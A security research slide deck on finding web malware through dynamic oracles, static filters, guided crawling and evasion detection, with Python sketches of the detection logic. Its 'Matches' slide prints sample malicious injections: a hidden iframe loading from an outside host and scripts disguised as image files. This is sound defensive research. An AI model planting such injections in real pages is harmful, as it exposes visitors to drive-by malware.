Chasing web-based malware
Marco Cova
marco@lastline.com
  
Who am I?
•  Lecturer in Computer Security at the University of Birmingham, UK
•  Member of the founding team of Lastline, Inc.
•  Research interests:
   – Malware analysis
   – Vulnerability analysis
  
WEB MALWARE
  
Web-based malware
[Diagram labels: evil.js, GET /, <iframe>]
  
Malicious code

Exploit

Social Engineering

Not really LinkedIn
Social Malware

Blackhat SEO
  
Watering Hole Attacks
•  Sometimes it is difficult to exploit the target of an attack directly
   – Instead, compromise a site that is likely to be visited by the target
•  Council on Foreign Relations → governmental officials
•  Unaligned Chinese news site → Chinese dissidents
•  iPhone dev web site → developers at Apple, Facebook, Twitter, etc.
•  Nation Journal web site → political insiders in Washington
  
CHASING WEB MALWARE
Oracles, Filters, Seeders, Anti-Evasions
  
Oracle
•  Essentially, a classification algorithm for web content
   – Input: web page
   – Output: classification (malicious or benign)
•  In practice, it is useful to extract and provide users with evidence to support classification
   – Exploit detection
   – Deobfuscation results
   – Anything that helps forensics, really
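The oracle contract described above (page in, verdict plus supporting evidence out) can be sketched as a small interface. This is only an illustration: `Verdict`, `toy_oracle`, and the two string markers are hypothetical names and checks, not part of any real oracle, which would observe behavior rather than match strings.

```python
from dataclasses import dataclass, field


@dataclass
class Verdict:
    """Classification of one page plus the evidence supporting it."""
    malicious: bool
    evidence: list = field(default_factory=list)


def toy_oracle(page_source: str) -> Verdict:
    """Stand-in oracle: flags a page on two hard-coded markers.

    The string checks are placeholders (an assumption for this sketch)
    so that the input/output contract can be exercised.
    """
    evidence = []
    if "unescape(" in page_source:
        evidence.append("deobfuscation: unescape() call found")
    if "display:none" in page_source and "<iframe" in page_source:
        evidence.append("hidden iframe found")
    # The page is reported as malicious only when some evidence was collected.
    return Verdict(malicious=bool(evidence), evidence=evidence)
```

Returning the evidence alongside the boolean keeps the verdict explainable, which is the point the slide makes about forensics.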
  
Oracle approaches
•  Nowadays, most oracles are dynamic analysis systems
   – We care about the behavior of a sample/web page/document
•  Run a sample/visit a web page inside an instrumented environment and monitor its behavior
•  Bypasses all obfuscation/feasibility concerns associated with static analysis
•  Opens up a lot of interesting challenges related to transparency and evasion
  
Wepawet
•  Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code
   Marco Cova, Christopher Kruegel, Giovanni Vigna, in Proceedings of the World Wide Web Conference (WWW), Raleigh, NC, April 2010
•  http://wepawet.cs.ucsb.edu
•  By the numbers:
   – Number of unique IPs that submitted to Wepawet: 141,463
   – Number of pages visited and analyzed by Wepawet: 67,424,459
   – Number of pages identified as malicious: 2,239,335
  
Wepawet Features
•  Exploit preparation
   – Number of bytes allocated (heap spraying)
   – Number of likely shellcode strings
•  Exploit attempt
   – Number of instantiated plugins and ActiveX controls
   – Values of attributes and parameters in method calls
   – Sequences of method calls
•  Redirections and cloaking
   – Number and target of redirections
   – Browser personality- and history-based differences
•  Obfuscation
   – String definitions/uses
   – Number of dynamic code executions
   – Length of dynamically-executed code
  
Filter
•  If everything goes well, after a while we will have more samples/pages than we can analyze in depth with our oracle
•  Analysis time ranges from a few seconds to a couple of minutes
   – Oracle actually runs the sample
   – Sometimes multiple times (anti-evasion techniques)
•  Challenge: how do we scale?
  
Static filtering
•  Quick identification of drive-by-download web pages
   – Each web page is deemed likely benign or likely malicious
•  Basis for the classification is a set of static features
•  Necessarily more imprecise than the oracle
   – We only worry about not having false negatives
   – Very tolerant of false positives (consequence: more work for our oracle)
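The trade-off above (no false negatives, false positives tolerated) can be illustrated with a threshold choice on a labeled set. This is a minimal sketch under assumptions: the filter is taken to produce a numeric suspicion score per page, and `pick_threshold` and `false_positive_rate` are hypothetical helper names.

```python
def pick_threshold(scores, labels):
    """Return the highest threshold that still flags every known-malicious page.

    scores: suspicion score per page (higher means more suspicious)
    labels: True if the page is known to be malicious
    A page is flagged when score >= threshold.
    """
    malicious_scores = [s for s, bad in zip(scores, labels) if bad]
    if not malicious_scores:
        raise ValueError("need at least one malicious example")
    # Flagging at the lowest malicious score keeps false negatives at zero.
    return min(malicious_scores)


def false_positive_rate(scores, labels, threshold):
    """Fraction of benign pages that would still be sent to the oracle."""
    benign_scores = [s for s, bad in zip(scores, labels) if not bad]
    if not benign_scores:
        return 0.0
    return sum(s >= threshold for s in benign_scores) / len(benign_scores)
```

Any benign page scoring above the chosen threshold becomes extra work for the oracle, which is the cost the slide accepts.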
  
Prophiler
•  Filter for malicious web pages
•  Prophiler: a Fast Filter for the Large-Scale Detection of Malicious Web Pages,
   Davide Canali, Marco Cova, Christopher Kruegel, Giovanni Vigna, in Proceedings of the International World Wide Web Conference (WWW), 2011
  
Static features
•  We define three classes of features (77 in total)
   – HTML (19)
      •  source: web page content
   – JavaScript (25)
      •  source: web page content
   – URL and host-based (33)
      •  source: page URL and URLs included in the content
•  One machine learning model for each feature class
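One way to picture "one model per feature class" is a dictionary of per-class models whose outputs are combined into a single decision. The slide does not say how the outputs are combined, so the "flag if any model flags" rule below is an assumption chosen to favor few false negatives; the feature names and lambda "models" are hypothetical stand-ins for trained classifiers.

```python
def flag_page(features_by_class, models):
    """Flag a page as suspicious if any per-class model flags it.

    features_by_class: dict mapping class name -> dict of feature values
    models: dict mapping class name -> callable returning True if suspicious
    The "any" combination is an assumption, not taken from the slides.
    """
    return any(models[name](features_by_class[name]) for name in models)


# Hypothetical stand-ins for the three trained models.
models = {
    "html": lambda f: f["hidden_iframes"] > 0,
    "javascript": lambda f: f["dynamic_code_executions"] > 5,
    "url": lambda f: f["uses_ip_address"],
}

page = {
    "html": {"hidden_iframes": 1},
    "javascript": {"dynamic_code_executions": 0},
    "url": {"uses_ip_address": False},
}
suspicious = flag_page(page, models)
```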
  
Example features
HTML features
•  iframe tags, hidden elements, elements with a small area, script elements, embed and object tags, scripts with a wrong filename extension, out-of-place elements, included URLs, scripting content percentage, whitespace percentage, meta refresh tags, double HTML documents, …
  
Matches

<div style="display:none">
<iframe src="http://biozavr.ru:8080/index.php" width=104 height=251 >
</iframe></div>

<body><div id="DivID">
  <script src='a2.jpg'></script>
  <script src='b.jpg'></script>
  <script src='url.jpg'></script>
  <script src='c.jpg'></script>
  <script src='d.jpg'></script>
  <script src='e.jpg'></script>
  <script src='f.jpg'></script>"
</body>
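A few of the HTML features listed earlier (iframe tags, hidden elements, scripts with a wrong filename extension) can be counted with Python's standard `html.parser`. This is a rough sketch, not Prophiler's implementation: the class and function names are hypothetical, and treating any script `src` that does not end in `.js` as "wrong" is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class HtmlFeatureCounter(HTMLParser):
    """Counts a few static HTML features in a single pass over the page."""

    def __init__(self):
        super().__init__()
        self.iframes = 0
        self.hidden_elements = 0
        self.wrong_ext_scripts = 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # Normalise the inline style so "display: none" and "display:none" match.
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            self.hidden_elements += 1
        if tag == "iframe":
            self.iframes += 1
        src = attrs.get("src")
        if tag == "script" and src:
            # Assumption: an external script is expected to end in ".js".
            if not urlparse(src).path.lower().endswith(".js"):
                self.wrong_ext_scripts += 1


def extract_html_features(html):
    """Return the feature counts for one HTML document as a dict."""
    counter = HtmlFeatureCounter()
    counter.feed(html)
    counter.close()
    return {
        "iframes": counter.iframes,
        "hidden_elements": counter.hidden_elements,
        "wrong_ext_scripts": counter.wrong_ext_scripts,
    }
```

On the two snippets above, this sketch would count one hidden element and one iframe for the first, and seven scripts with a wrong extension for the second.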
  
Evaluation
•  Large-scale evaluation of Prophiler
•  60 days of crawling + analysis
•  18,939,908 unlabeled pages
•  14.3% of pages flagged as suspicious and submitted to Wepawet (13.7% FP)
•  85.7% load reduction on Wepawet = saving more than 400 days of analysis!
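The figures above can be cross-checked with a few lines of arithmetic. The page count and percentages come from the slide; the last step is only a back-of-the-envelope check that assumes the skipped pages would have been analyzed one after another, which the slide does not state.

```python
TOTAL_PAGES = 18_939_908   # unlabeled pages crawled (from the slide)
FLAGGED_FRACTION = 0.143   # share flagged as suspicious (from the slide)

flagged_pages = round(TOTAL_PAGES * FLAGGED_FRACTION)  # sent on to Wepawet
skipped_pages = TOTAL_PAGES - flagged_pages            # never reach Wepawet
load_reduction = 1 - FLAGGED_FRACTION                  # about 0.857

# Assumption: sequential analysis. Saving 400 days then corresponds to this
# average analysis time per skipped page, in seconds.
seconds_per_page = 400 * 24 * 3600 / skipped_pages
```

Under that assumption, 400 days works out to roughly 2.1 seconds per skipped page, which sits at the low end of the "few seconds to a couple of minutes" range quoted for the oracle.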
  
Smart crawler
•  How do we seed our oracle + filter?
•  Obvious idea: crawling
   – Problem: toxicity of regular crawling is pretty low
   – Observation: crawling is only as good as the initial seeds
•  Challenge: can we find better seeds?
  
EvilSeed
•  Guided search approach to increase toxicity of pages that are crawled
•  Inputs: malicious web pages found in the past
•  Output: set of (more likely malicious) web pages
•  EVILSEED: A Guided Approach to Finding Malicious Web Pages, Luca Invernizzi, Stefano Benvenuti, Paolo Milani, Marco Cova, Christopher Kruegel, Giovanni Vigna, in Proceedings of the IEEE Symposium on Security and Privacy, 2012
  
Gadgets	
  
Gadgets
•  Links gadget (malware hub)
•  Content dorks gadget
•  SEO gadget
•  Domain registration gadget
•  DNS queries gadget
  
Anti evasion
•  At this point in the story, the bad guys will actively try to evade your system
•  Lots of effort in designing evasion techniques
   – Analysis environment detection
   – User detection
   – Stalling
•  Challenge: how do we detect if we are being evaded?
  
Revolver
•  Assumption: attackers are likely to take existing malicious samples/web pages and enhance them to add evasive code
•  Idea: detect similar samples that are classified differently by the oracle
•  Revolver: An Automated Approach to the Detection of Evasive Web-based Malware
   A. Kapravelos, Y. Shoshitaishvili, M. Cova, C. Kruegel, G. Vigna, in Proceedings of the USENIX Security Symposium, Washington, D.C., August 2013
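The idea above (similar samples, different verdicts) can be sketched with Python's standard `difflib`. This is an illustration, not Revolver's algorithm: it compares hand-written sequences of node types rather than real JavaScript ASTs, and `similarity`, `candidate_pairs`, and the 0.7 threshold are assumptions made for the sketch.

```python
from difflib import SequenceMatcher


def similarity(seq_a, seq_b):
    """Similarity in [0, 1] between two sequences of node-type names."""
    return SequenceMatcher(None, seq_a, seq_b, autojunk=False).ratio()


def candidate_pairs(samples, threshold=0.7):
    """Find similar samples that the oracle classified differently.

    samples: list of (name, node_sequence, verdict) tuples, where verdict
    is "benign" or "malicious". Returns (benign_name, malicious_name, score).
    """
    benign = [s for s in samples if s[2] == "benign"]
    malicious = [s for s in samples if s[2] == "malicious"]
    pairs = []
    for b_name, b_seq, _ in benign:
        for m_name, m_seq, _ in malicious:
            score = similarity(b_seq, m_seq)
            if score >= threshold:
                pairs.append((b_name, m_name, score))
    return pairs


# Hypothetical samples: the "benign" one is the malicious one plus a guard.
original = ["VAR", "ASSIGN", "CALL", "STRING", "CALL", "EVAL"]
guarded = ["IF", "VAR", "LE", "NUM"] + original
unrelated = ["FUNC", "RETURN", "NUM"]

pairs = candidate_pairs([
    ("original.js", original, "malicious"),
    ("guarded.js", guarded, "benign"),
    ("unrelated.js", unrelated, "benign"),
])
```

A pair such as `guarded.js` and `original.js` is only a candidate: the added guard may be an evasion, but it could equally be an unrelated change that needs further inspection.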
  
Revolver
[Diagram labels: Web; Oracle; Pages; ASTs (IF, VAR <= NUM, …); Similarity computation; Candidate pairs {bi, mj}; Malicious evolution; Data-dependency; JavaScript infections; Evasions]
  
Revolver	
  
[Architecture diagram labels: Terms Extractor; Malicious Pages; Feature Extractor; Public Portal; Crawler; C&C Site; Honeyclient (three instances); Wepawet; Cloud; EvilSeed; example URLs http://www.easymoney.com, http://cheapfarma.ru, http://rateyourcar.com, http://nudecelebrities.it; Prophiler; Benign Pages; Possibly Malicious Pages; Anubis; Exploit Site; Malicious Pages; Benign Pages; Threat Intel; Block]
  
Challenges
•  Evasions
   – Detection
   – Bypass (when possible)
•  Targeted attacks
•  Defense/offense imbalance
  
